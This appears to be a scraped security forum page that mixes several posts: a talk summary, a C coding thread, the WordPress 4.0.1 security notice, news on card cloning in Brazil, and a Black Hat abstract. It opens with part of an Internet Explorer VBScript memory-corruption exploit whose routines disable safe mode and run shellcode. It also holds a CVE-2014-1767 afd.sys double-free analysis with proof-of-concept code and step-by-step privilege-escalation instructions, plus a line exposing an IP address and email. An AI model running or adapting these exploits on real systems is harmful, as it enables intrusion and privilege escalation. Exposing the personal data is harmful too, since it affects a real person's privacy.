intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function

function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>

Source: http://www.exploit-db.com/exploits/35308/
-
An example from last year. How the company Distinct "took care" of Evomag.

Bogdan Belu, CEO of Distinct, spoke at Internet and Mobile World about scalability problems and solutions for high-traffic situations. The presentation was titled "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013" (Case study: How Distinct helped evoMAG.ro cope with the Black Friday 2013 traffic peak).

Summary: Scaling your website to accept a large increase in customers in a short period of time is a challenge for all parties involved (network administrators, datacenter, software developers, webmasters). This presentation is about how we scaled the website of the IT retailer evoMAG.ro during the Black Friday 2013 event, what the common problems were and which solutions we identified.

Slides: "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013" (PDF, English)

Video here: IMWORLD 2014 - Prezentare Bogdan Belu: Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013
-
@MrGrj:
- strstr - walks the character string
- strcpy - walks the character string
- strlen - walks the character string

Avoid strlen (by specifying the size) and strstr (by processing the string manually). Screw you, em.
-
Read and understand the code, boss. You said it should be O(n).
-
#include <stdio.h>
#include <string.h>

int main()
{
    char sir_initial[] = "Ana are mere!";
    char sir_inlocuire[] = "_spatiu_";
    char sir_nou[1024] = {0};
    size_t sir_inloc_lungime = 8;
    int pos_nou = 0;
    int i = 0;

    /* single pass over sir_initial: ordinary characters are copied through,
       every space is expanded into sir_inlocuire at the current output position */
    while(sir_initial[i])
    {
        if(sir_initial[i] == ' ')
        {
            int x = pos_nou;
            pos_nou = pos_nou + sir_inloc_lungime;
            strncpy(sir_nou + x, sir_inlocuire, sir_inloc_lungime);
            i++;
        }
        else
            sir_nou[pos_nou++] = sir_initial[i++];
    }
    printf("%s\n", sir_nou);

    return 0;
}
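The snippet above is O(n), but it writes into a fixed 1024-byte sir_nou without ever checking that the expanded string fits: a long enough input with many spaces overruns the buffer. The following is an added example, not code from this thread, of the same single-pass replacement written the way a reviewer would ask for it: the destination size is a parameter, the replacement length is passed in (no strlen per match, as suggested above), and the function returns the length the full result needs, in the style of snprintf, so the caller can detect truncation. The function name replace_char and the sample input are mine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Replace every `needle` byte in `src` with the `repl_len` bytes of `repl`,
 * in a single pass over `src`. At most dst_size-1 bytes plus a NUL are
 * written to `dst`; the return value is the length the complete result
 * needs, so ret >= dst_size means the copy in `dst` was truncated
 * (the same contract snprintf uses). Passing repl_len avoids calling
 * strlen on every match. */
size_t replace_char(char *dst, size_t dst_size, const char *src,
                    char needle, const char *repl, size_t repl_len)
{
    size_t out = 0;   /* length of the full (untruncated) result so far */

    for (size_t i = 0; src[i] != '\0'; i++) {
        if (src[i] == needle) {
            for (size_t k = 0; k < repl_len; k++) {
                if (out + 1 < dst_size)   /* keep room for the NUL */
                    dst[out] = repl[k];
                out++;
            }
        } else {
            if (out + 1 < dst_size)
                dst[out] = src[i];
            out++;
        }
    }
    /* Always NUL-terminate, whether or not the result was cut short. */
    if (dst_size > 0)
        dst[out < dst_size ? out : dst_size - 1] = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample input: the sentence used in the thread. */
    const char *input = "Ana are mere!";
    char big[64];
    char small[12];

    size_t need = replace_char(big, sizeof big, input, ' ', "_spatiu_", 8);
    printf("%s (needs %zu bytes)\n", big, need + 1);

    /* A buffer that is too small: output is cut short but still terminated,
     * and the return value tells the caller how much space a full copy needs. */
    need = replace_char(small, sizeof small, input, ' ', "_spatiu_", 8);
    if (need >= sizeof small)
        printf("truncated: \"%s\" (needs %zu bytes)\n", small, need + 1);
    return 0;
}
```

Because the return value is the untruncated length, a caller can size the destination exactly with a first call using dst_size 0, then allocate need + 1 bytes and call again; that is still two linear passes, so the O(n) bound from the thread holds.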
-
Maybe after the conference ends, the recordings of the talks (video) and the presentations (pdf/pptx) will also be published on the site.
-
[h=2]WordPress 4.0.1 Security Release[/h]

Posted November 20, 2014 by Andrew Nacin. Filed under Releases, Security.

WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours.

If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don't support older versions, so please update to 4.0.1 for the latest and greatest.)

WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by Jouko Pynnonen. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues:

- Three cross-site scripting issues that a contributor or author could use to compromise a site. Discovered by Jon Cave, Robert Chapin, and John Blackbourn of the WordPress security team.
- A cross-site request forgery that could be used to trick a user into changing their password.
- An issue that could lead to a denial of service when passwords are checked. Reported by Javier Nieto Arevalo and Andres Rojas Guerrero.
- Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu).
- An extremely unlikely hash collision could allow a user's account to be compromised, which also required that they haven't logged in since 2008 (I wish I were kidding). Reported by David Anderson.
- WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by Momen Bassel, Tanoy Bose, and Bojan Slavković of ManageWP.

Version 4.0.1 also fixes 23 bugs with 4.0, and we've made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by Chris Andrè Dale.

We appreciated the responsible disclosure of these issues directly to our security team. For more information, see the release notes or consult the list of changes.

Download WordPress 4.0.1 or venture over to Dashboard → Updates and simply click "Update Now".

Already testing WordPress 4.1? The second beta is now available (zip) and it contains these security fixes. For more on 4.1, see the beta 1 announcement post.

More info: https://wordpress.org/news/2014/11/wordpress-4-0-1/
-
Brazilian banks lost a great chance to be ahead in Security
Nytro posted a topic in Stiri securitate
Brazilian banks lost a great chance to be ahead in Security The biggest Brazilian TV channel, presents on last Sunday, a story about carders gang responsible for the “first EVM clone” case. According reporter, the gang had a hacker, called “director” by a member of gang, which was responsible for technology. Then the other members changed electronic circuits on point-of-sales machines to store pin and card during a transaction. After some days, carders collect data using Bluetooth and then clone chip information to blank cards. That is enough to begin to take money on ATM and buying at some electronic stores. The gang members bought electronics goods, spent money on nightlife and bought a house with estimated value of USD 500,000.00 on Rio de Janeiro, using money raised on frauds. The victims that claimed for the items not bought had reimbursement denied because according banking the pin and chip combination “cannot” be violated. During story, the FEBRABAN director said this situation only occurs with bank institutions that did not implement full security features, available on EVM technology. Also affirmed that in 2014, all Brazilian banks has implemented full security. Why you did not implemented this before? That is a good question and we probably know the response. It is not because they did not have knowledge about that security features. It is probably because it is faster and cheaper to implement without all features. That is what we called “Security by obscurity”, when they think it is safe just because the common people does not know how that stuff works. Another dictate says “Cheap is Expensive” and this kind of frauds has been classified as money loss. Unfortunately, accountants cannot calculate the client loss with time calling customer center and angry to take care on an issue that is not his responsibility. This formula is repeatedly used in many places, where they prefer to delivery something fast and unsafe or with minimal security. 
Sometimes, the absence of human resources to do the job may be the reason for some enterprises.

Cyber Manifesto for Security Changes

One of the items listed in the Cyber Manifesto for Security Changes is to call business administrators to security governance. It looks obvious: if you run a business, you should care about the security of your customers and of the business, but the daily reality is different, as we can see from this TV story. The absence of security alarms US banking institutions, which are planning the delivery of EMV cards next year. A fraud seen in Brazil can quickly be used in Europe or North America, faster than the solution to solve it. In terms of fraud, the Brazilians are at the top of the list, because, as well said by Fabio Assolini – "Brazil has some of the most creative and active criminals specializing in credit card cloning" – in his article called Tips for using ATMs and avoiding credit card cloning.

Conclusion

One more time, companies lost the opportunity to protect themselves before bad things happened. Many times we, security professionals, avoid treating business like a lotto or a casino roulette, but sometimes we need to take risks due to a small budget. Pay attention when we alert about fraud risk, and let Information Security help the business grow healthily.

Image Credit: Claran McGuiggan Sursa: https://www.linkedin.com/today/post/article/20141118004108-8638059-brazilian-banks-lost-a-great-chance-to-be-ahead-in-security -
IP: 95.19.205.12 Mail: vipvideos1234@gmail.com
-
Black Hat USA 2014 - Exploit: Abusing Performance Optimization Weaknesses To Bypass ASLR Description: The primary goal of ASLR is to effectively randomize a program's memory layout so that adversaries cannot easily infer such information. As ASLR is a critical defense against exploitation, there have been tremendous efforts to evaluate the mechanism's security. To date, previous attacks that bypass ASLR have focused mostly on exploiting memory leak vulnerabilities, or abusing non-randomized data structures. In this presentation, we leverage vulnerabilities introduced by performance-oriented software design to reveal new ways in which ASLR can be bypassed. In addition to describing how vulnerabilities originate from such designs, we will present real attacks that exploit them. First, we analyze general hash table designs for various programming languages (JavaScript, Python, Ruby). To optimize object tracking for such languages, their interpreters may leak address information. Some hash table implementations directly store the address information in the table, while others permit inference of address information through repeated table scanning. We exhaustively examined several popular languages to see whether each of them has one or both of these problems, and present how they can be leveraged. As a concrete example, we demonstrate how address information can be leaked in the Safari web browser by simply running some JavaScript. Second, we present an analysis of the Zygote process creation model, which is an Android operating system design for speeding up application launches. The results of our examination show that Zygote weakens ASLR because all applications are created with largely identical memory layouts. To highlight the severity of this issue, we demonstrate two different ASLR bypass attacks using real applications - Google Chrome and VLC Media Player. For More Information Please visit : - Black Hat | Home
-
CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit

[0x00]. Introduction

First, I would like to present the reasons why I focused on this vulnerability: (1) This afd.sys dangling pointer vulnerability was named the best privilege escalation vulnerability at the Pwnie Awards 2014. (2) The vulnerability type is double-free, which is very interesting. (3) So far, no exploit code has been published, so it is challenging and exciting to finish one exploit. OK, now let's go to work. Our experiment OS is Windows 7 (6.1.7601) 32-bit.

[0x01]. Vulnerability Root Cause Analysis

A. PoC overview

Our most important reference was the paper: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf. From the description in the paper, we can get our PoC as follows:
=================================================
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "WS2_32.lib")

int main()
{
    DWORD targetSize = 0x310 ;
    DWORD virtualAddress = 0x13371337 ;
    DWORD mdlSize = (0x4000*(targetSize-0x30)/8) - 0xFFF - (virtualAddress & 0xFFF) ;
    static DWORD inbuf1[100] ;
    memset(inbuf1, 0, sizeof(inbuf1)) ;
    inbuf1[6] = virtualAddress ;
    inbuf1[7] = mdlSize ;
    inbuf1[10] = 1 ;
    static DWORD inbuf2[100] ;
    memset(inbuf2, 0, sizeof(inbuf2)) ;
    inbuf2[0] = 1 ;
    inbuf2[1] = 0x0AAAAAAA ;
    WSADATA WSAData ;
    SOCKET s ;
    struct sockaddr_in sa ;
    int ierr ;
    WSAStartup(0x2, &WSAData) ;
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
    memset(&sa, 0, sizeof(sa)) ;
    sa.sin_port = htons(135) ;
    sa.sin_addr.S_un.S_addr = inet_addr("127.0.0.1") ;
    sa.sin_family = AF_INET ;
    ierr = connect(s, (const struct sockaddr *)&sa, sizeof(sa)) ;
    static char outBuf[100] ;
    DWORD bytesRet ;
    DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0x30, outBuf, 0, &bytesRet, NULL);
    DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0x18, outBuf, 0, &bytesRet, NULL);
    return 0 ;
}
=================================================
With WinDbg, we got the following crash information:
=================================================
BAD_POOL_CALLER (c2)
The current thread is making a bad pool request. Typically this is at a bad IRQL level or double freeing the same allocation, etc.
Arguments:
Arg1: 00000007, Attempt to free pool which was already freed
Arg2: 00001097, (reserved)
Arg3: 08bd0002, Memory contents of the pool block
Arg4: 854b2a20, Address of the block of pool being deallocated
Debugging Details:
------------------
POOL_ADDRESS: 854b2a20 Nonpaged pool
FREED_POOL_TAG: Mdl
STACK_TEXT:
8d524a60 83f6dc6b 000000c2 00000007 00001097 nt!KeBugCheck2+0x68b
8d524ad8 83ed8ec2 854b2a20 00000000 8636d260 nt!ExFreePoolWithTag+0x1b1
8d524aec 88787eb0 854b2a20 00000000 8876a89f nt!IoFreeMdl+0x70
8d524b08 8876a8ac 00000000 00000001 05244d85 afd!AfdReturnTpInfo+0xad
8d524b44 8876bbba 05244d2d 000120c3 8876ba8c afd!AfdTliGetTpInfo+0x89
8d524bec 887702bc 854a2db8 86472720 8d524c14 afd!AfdTransmitPackets+0x12e
8d524bfc 83e83593 86472720 8540f550 8540f550 afd!AfdDispatchDeviceControl+0x3b
=================================================
We can get the I/O control code from the stack:
kd> dd 8d524d04
8d524d04 8d524d34 83e8a1ea 00000050 00000000
8d524d14 00000000 00000000 001cf984 000120c3
========================================
It is I/O control code 0x120C3 which triggers the system crash; the problem is a double free, and the object is an MDL object.
From the call stack, we know AfdTransmitPackets will be our main job, but we must finish analyzing the function AfdTransmitFile first, because 0x120C3 was the second DeviceIoControl call; the first I/O control code was 0x1207F, and in that call we reach AfdTransmitFile, where, as we will see, the first FREE happened! So we will start the analysis from the function AfdTransmitFile.

B. Analysis of the First IO CONTROL CALL

a. Analysis of AfdTransmitFile

AfdTransmitFile has two arguments, arg1=pIrp, arg2=pIoStackLocation; the function can access user input through arg2. We set some special values in inbuf1 in the PoC. We guessed these values were used to control the execution flow; after reversing and debugging, we found the following 'if' conditions would be TRUE, and we would reach the call to the function AfdTliGetTpInfo.
============================
AfdTransmitFile(pIrp, pIoStack):
inputBufferLen >= 0x30
inputBuffer & 0x3 == 0
inputBuffer < 0x7fff0000
memcpy(tempBuf, userBuf, 0x30) ;
if((*(DWORD*)(tempBuf+0x28) & 0xFFFFFFC8) == 0)
if((*(DWORD*)(tempBuf+0x28) & 0x30) != 0x30)
if((*(DWORD*)(tempBuf+0x28) & 0x30) == 0)
tpInfo = AfdTliGetTpInfo ( 3 ) // if we satisfy all the conditions above, we'll reach the call to AfdTliGetTpInfo
=============================
b. Analysis of AfdTliGetTpInfo

The code above shows that if our inbuf1 satisfies those conditions, we reach a call to AfdTliGetTpInfo. This function generally returns a pointer to a TpInfo structure, but what is a TpInfo structure?
By reversing some functions (AfdTliGetTpInfo, AfdReturnTpInfo, AfdAllocateTpInfo, AfdInitializeTpInfo) and debugging, we got the following definition:
========================
struct TpInfo {
    …
    TpElement *pElemArray ; // +0x20, pointer to TpElement array
    …
    ULONG elemCount ;       // +0x28, element number in pElemArray array
    …
    BYTE isOuterMem ;       // +0x32, whether pElemArray is stored outside TpInfo
    …
} ;

struct TpElement {
    int flag ;              // +0x00
    ULONG length ;          // +0x04
    PVOID virtualAddress ;  // +0x08
    PMDL pMdl ;             // +0x0C
    ULONG reserved1 ;
    ULONG reserved2 ;
} ;
===============================
AfdTliGetTpInfo function in IDA:
The figure shows the C-like code of AfdTliGetTpInfo; this function gets one TpInfo structure from a lookaside list. For ExAllocateFromNPagedLookasideList, we get its key flow from the reversed code:
======================
TpInfo* __stdcall ExAllocateFromNPagedLookasideList(PNPAGED_LOOKASIDE_LIST Lookaside)
{
    *(Lookaside+0x0C) ++ ;
    tpInfo = InterlockedPopEntrySList( Lookaside ) ;
    if( tpInfo == NULL)
    {
        *(Lookaside+0x10)++ ;
        tpInfo = AfdAllocateTpInfo(NonPagedPool, 0x108, 0xc6646641) ;
    }
    return tpInfo ;
}
=======================
For AfdAllocateTpInfo, its C-like reversed code is here:
============================
TpInfo * AfdAllocateTpInfo(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag)
{
    p = ExAllocatePoolWithTagPriority(NonPagedPool, 0x108, 0xc6646641) ;
    AfdInitializeTpInfo(p, 3, 3, 1) ;
    return p ;
}
============================
And for AfdInitializeTpInfo, it simply initializes one TpInfo structure; the following code shows the initial values of the structure members we are interested in.
========================
AfdInitializeTpInfo(tpInfo, elemCount, stacksize, x)
{
    ….
    tpInfo->pElemArray = tpInfo+0x90 ;
    tpInfo->elemCount = 0 ;
    tpInfo->isOuterMem = false ;
    ….
}
=========================
After debugging and tracing we found the execution flow will be: ExAllocateFromNPagedLookasideList -> AfdAllocateTpInfo, AfdInitializeTpInfo. After all these functions execute, we get one TpInfo structure which is 0x108 bytes and has its pElemArray initialized as tpInfo+0x90, elemCount as 0, and isOuterMem as 0. As for the member isOuterMem: if the number of elements in pElemArray is greater than 3, the elements are stored outside the TpInfo structure, another buffer is allocated to store them, and isOuterMem is set to 1.

Now let's return to the function AfdTransmitFile. We have just obtained one TpInfo structure via AfdTliGetTpInfo; what happens next? After we pass the if conditions, IoAllocateMdl is called to allocate one MDL object, and the arguments used to allocate the MDL come from our inbuf1! This is exciting: the user buffer controls the MDL's virtualAddress and length! Next, once we have the MDL pointer, the pages it describes are locked with MmProbeAndLockPages. But, since the virtual address range we supplied is invalid (0x13371337 ~ 0x13371337+length), we get an exception and flow into the exception handler! In the exception handler, the function AfdReturnTpInfo is called. This is our vulnerable function; it is so important that I reversed nearly all of its asm code to C code. The following is the result:
===========================
for(int i = 0 ; i < *(DWORD*)(tpInfo+0x28) ; i++)
{
    PTPELEMENT tpElemArray = (PTPELEMENT)*(DWORD*)(tpInfo + 0x20) ;
    PTPELEMENT tpElement = (PTPELEMENT)((BYTE*)tpElemArray + i*0x18) ;
    if((tpElement->flag & 0x02) == 0)
    {
        if(tpElement->flag < 0)
        {
            PMDL pMdl = tpElement->pMdl ; // +0x0C
            if(pMdl != NULL)
            {
                if(pMdl->MdlFlags & 0x02)
                {
                    MmUnlockPages(pMdl) ;
                }
                // we free the MDL
                // dangling pointer here!
                IoFreeMdl(pMdl) ;
            }
        }
    }
}
if(*(BYTE*)(tpInfo+0x32) != 0)
{
    ExFreePoolWithTag(*(DWORD*)(tpInfo+0x20), 0xC6646641) ;
    *(BYTE*)(tpInfo+0x32) = 0 ;
}
if(arg2) // in our debugging, arg2=1
{
    // push TpInfo into the lookaside list
    ExFreeToNPagedLookasideList(AfdGlobalData+0x178, tpInfo) ;
}
else
{
    AfdFreeTpInfo(tpInfo) ; // ExFreePoolWithTag
}
===========================
In this function, we see it simply enumerates all the elements in pElemArray (elemCount indicates the total number of elements in the array) and tries to free the MDL object if the element stores one. The problem is that it doesn't clear the pMdl pointer, and it doesn't clear elemCount in TpInfo! That means that if you have the ability to call the function AfdReturnTpInfo once again with this tpInfo, all the obsolete values will be treated as valid, and the double-free bug occurs! Sounds exciting: we found the bug and know how to trigger it, but how can we call AfdReturnTpInfo once again with the TpInfo in the lookaside list? Note that AfdReturnTpInfo puts the TpInfo pointer into the lookaside list. So let's see what the PoC code does.

C. Analysis of the second DeviceIoControl call

a. AfdTransmitPackets

In the second call, the I/O control code is 0x120C3, and AfdTransmitPackets is invoked. The function's pseudo code is like this:
====================================
__fastcall AfdTransmitPackets(PIRP Irp, PIO_STACK_LOCATION IoStack)
{
    IoStack->InputBufferLength >= 0x10
    IoStack->Type3InputBuffer & 3 == 0
    IoStack->Type3InputBuffer < 0x7fff0000
    memcpy(tempBuf, IoStack->Type3InputBuffer, 0x10);
    (*(DWORD*)(tempBuf+0x0C) & 0xFFFFFFF8) == 0
    (*(DWORD*)(tempBuf+0x0C) & 0x30) != 0x30
    *(DWORD*)(tempBuf) != 0
    *(DWORD*)(tempBuf+4) != 0
    *(DWORD*)(tempBuf+4) <= 0x0AAAAAAA
    // if we satisfy all the above conditions, we arrive here
    // user controlled argument for AfdTliGetTpInfo!
    AfdTliGetTpInfo( *(DWORD*)(tempBuf+4) ) ;
}
=====================================
We have set inbuf2: *(inbuf2) = 1, *(inbuf2+4) = 0x0AAAAAAA. With these values we reach the call to AfdTliGetTpInfo, and the argument will be the 0x0AAAAAAA we specified. We have analyzed the function AfdTliGetTpInfo, so we know it will pop one tpInfo structure from the lookaside list if the list is not empty! Of course it's not empty, we just pushed one in! So the tpInfo structure we get from the list is just the first one, with obsolete values inside it. Then, in AfdTliGetTpInfo, we reach the if condition because 0x0AAAAAAA > 3, so ExAllocatePool is called, but the allocation size is 0x18*0x0AAAAAAA == 0xFFFFFFF0 bytes! That is such a big size on a 32-bit OS that we get an exception again! This time, in this exception handler, we arrive at AfdReturnTpInfo again! So that fits our plan: the obsolete TpInfo is passed to AfdReturnTpInfo, and the double-free bug occurs!

D. Root cause summary

[1] The first DeviceIoControl calls AfdTransmitFile; in this function we get one TpInfo structure by calling AfdTliGetTpInfo, one MDL object is allocated using the user-supplied virtual address and length, and the MDL address is stored in the TpInfo. Next, when the pages are locked by calling MmProbeAndLockPages, we get an exception because we gave the MDL an invalid address range! In the exception handler, the program calls AfdReturnTpInfo, which simply frees the MDL and pushes the TpInfo into the list. The bug is that all the obsolete values, including elemCount and pMdl, are still in the structure and not cleared!
[2] The second DeviceIoControl calls AfdTransmitPackets internally; this function simply calls AfdTliGetTpInfo with our user data as its parameter (we set it to 0x0AAAAAAA). When AfdTliGetTpInfo executes, the TpInfo used in [1] is popped and used, but next we get an exception when it tries to allocate a large memory block, and the exception handler calls AfdReturnTpInfo. In AfdReturnTpInfo, the obsolete values are treated as valid, so the double-free bug occurs!

[0x02]. Double-free Vulnerability Exploit

a. General steps (from the PDF paper):
[1]. Invoke DeviceIoControl with IoControlCode = 0x1207F, freeing the MDL object
[2]. Create one kernel object X to occupy the freed space
[3]. Invoke DeviceIoControl with IoControlCode = 0x120C3; now, because of the double-free bug, the object X we just created is freed
[4]. Occupy the freed object X space with our controlled data (double-free to use-after-free)
[5]. Try to invoke one function which operates on object X and has the ability to perform one 'write any dword to any address'. Considering that in [4] we control the object fields, this is possible; all that is needed is a function with some internal statement that uses our object content as an address! If we find such an object with this perfect function, we try to hijack HalDispatchTable
[6]. In user mode, trigger the HalDispatchTable function invocation; then we can flow to kernel-mode shellcode

b. What's the object X?

Object X is used as the use-after-free object; there are two restrictions here: (1) the allocated size should be equal to the freed MDL size; (2) the object must have some function with which we can internally perform one 'write anything anywhere'. For (1), we don't need to worry, because we can control the freed MDL size! As mentioned above, AfdTransmitFile allocates the MDL using our supplied virtual address and length, so we can control the MDL size.
In more detail:
pages = (((Length & 0xFFF) + (VirtualAddress & 0xFFF) + 0xFFF) >> 12) + (Length >> 12)
freedSize = mdlSize = pages*sizeof(PVOID) + 0x1C
For (2), it's tricky and hard to find such a perfect function; we referred to the PDF paper and found the 'WorkerFactory' object. We can create a WorkerFactory object with NtCreateWorkerFactory, and the perfect function is NtSetInformationWorkerFactory; let's have a look at its code:
We find there is one assignment statement inside, and after analysis the control flow reaches it when (arg2==8 && *arg3!=0). We can set *arg3 = ShellCode and *(*object+0x10)+0x1C = &HalDispatchTable[1]; then our shellcode address is written to HalDispatchTable!

C. How can we occupy the freed WorkerFactory object using our controlled data?

The user-mode function VirtualAlloc has no ability to allocate kernel non-paged pool memory for us, so the solution follows the same idea as NtSetInformationWorkerFactory: we should find one Nt* kernel function that has the ability to allocate kernel memory and copy our user data to the allocated pool! With the hint in the PDF, we focus on the function NtQueryEaFile. Inside, this function simply calls:
p = ExAllocatePoolWithQuotaTag(NonPagedPool, EaLength, 0x20206F49)
memcpy(p, EaList)
EaLength and EaList are user controlled! This function is perfect for us: it allocates non-paged pool memory and copies our data to that buffer. Although it frees this pool before it exits, the pool has only its first several bytes corrupted. There is one problem we should notice: here ExAllocatePoolWithQuotaTag is used rather than ExAllocatePoolWithTag, and they differ in allocation size; ExAllocatePoolWithQuotaTag internally calls ExAllocatePoolWithTag(PoolType, length+4, tag). So, if we would like to occupy the corrupted object successfully, we need to specify EaLength = ObjSize-4.

c. What's the allocation size of the WorkerFactory object?
Only by identifying this can we do a series of occupy-free operations. To find it, you should trace and debug the following functions: NtCreateWorkerFactory -> ObpCreateObject -> ObpAllocateObject -> ExAllocatePoolWithTag. In our environment, this allocation size is 0xA0 bytes, with 0x28 bytes of additional information wrapping the object body. The first 0x28 bytes contain the object header information; we should set valid data there, otherwise ObReferenceObjectByHandle fails when invoked in NtSetInformationWorkerFactory.

d. Exploit flow design: su to SYSTEM successfully!

[1]. Invoke DeviceIoControl with code 0x1207F; by designing the input virtual address and length, we let the kernel allocate the MDL object with size 0xA0, and finally the kernel frees it.
[2]. NtCreateWorkerFactory creates a new WorkerFactory object; because of the size, this object occupies the memory space freed in [1]
[3]. Invoke DeviceIoControl with code 0x120C3; by designing the input, we lead the control flow to the double-free bug, and this simply frees the memory our new WorkerFactory object just occupied!
[4]. NtQueryEaFile: this places controlled data (a fake object) in the memory just freed in [3]
[5]. NtSetInformationWorkerFactory operates on the fake object and internally causes a HalDispatchTable write; we change the DWORD at HalDispatchTable+4 to the shellcode address.
[6]. Trigger from user mode by calling NtQueryIntervalProfile

e. Say no to BSOD, hack the HandleTableEntry

We found that although we can get a SYSTEM command shell, when we close the exploit exe program the system gets a blue screen! It's easy to understand the root cause: we have destroyed the WorkerFactory object, but the system isn't aware of this; when the exe process exits, it frees all handle resources and we get an invalid memory access exception.
===============
93da9b74 83e8d3d8 00000000 bad0b124 00000000 nt!MmAccessFault+0x106
93da9b74 8409210f 00000000 bad0b124 00000000 nt!KiTrap0E+0xdc
93da9c38 840c0ba9 890d33b0 95e7c288 853f4030 nt!ObpCloseHandleTableEntry+0x28
93da9c68 840a8f86 890d33b0 93da9c7c 890012c8 nt!ExSweepHandleTable+0x5f
93da9c88 840b6666 bee06ad8 00000000 853f36a0 nt!ObKillProcess+0x54
93da9cfc 840a8bb9 00000000 ffffffff 002dfa38 nt!PspExitThread+0x5db
93da9d24 83e8a1ea ffffffff 00000000 002dfa44 nt!NtTerminateProcess+0x1fa
=================
We found the solution in ExSweepHandleTable:
======================
Handle = 4
while(ObjectTable->HandleCount)
{
    HandleTableEntry = ExpLookupHandleTableEntry(ObjectTable, Handle) ;
    if(*(DWORD*)HandleTableEntry & 1)
    {
        ObpCloseHandleTableEntry(…) ;
    }
    Handle += 4 ;
}
======================
As you see, ExSweepHandleTable enumerates every handle's HandleTableEntry, and the 'if' condition checks the first DWORD in the HandleTableEntry. Our solution is to set this field to NULL; then the free flow for that specific handle is bypassed! The relationship between Handle and HandleTableEntry is like this (we got it by reversing ExpLookupHandleTableEntry):
HandleTableEntry = *(DWORD*)ObjectTable + 2*(Handle & 0xFFFFFFC0)

[0x03] Last

For Win 7 x64, the structure offsets need to be modified, and you should use CreateRoundRectRgn to eat kernel memory. For Windows 8, the exploit would be more challenging; please refer to the PDF. NtSetInformationWorkerFactory and NtQueryEaFile are both treasures!
BY : 0x710DDDD 2014-11-19 afd_1767_Exp
Sursa: [EnglishVersion]CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu
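The stale-state defect the post describes in AfdReturnTpInfo (the MDLs are freed, but pMdl and elemCount stay behind in the TpInfo that is then recycled through the lookaside list) can be reproduced as a small model. The following is an added example, not code from the post or from afd.sys: a simulated pool stands in for the non-paged pool so that the second free is caught instead of corrupting memory, and every name here (Pool, TpInfo, TpElement, transmit_file_fail, return_tp_info_vulnerable, return_tp_info_fixed, run_twice) is illustrative rather than an afd.sys symbol. The fixed variant shows what an idempotent release routine has to do before an object goes back on a lookaside list: clear each freed reference and reset the count.

```python
"""Model of the AfdReturnTpInfo stale-state bug and the cleanup that fixes it.

Added example (not the post's or afd.sys's code). A tiny simulated pool
replaces the kernel pool so a double free raises instead of corrupting memory.
"""
from dataclasses import dataclass, field
from typing import Optional


class DoubleFree(Exception):
    """Raised by the simulated pool when a chunk is freed twice."""


class Pool:
    """Simulated non-paged pool: hands out chunk ids and tracks live ones."""

    def __init__(self):
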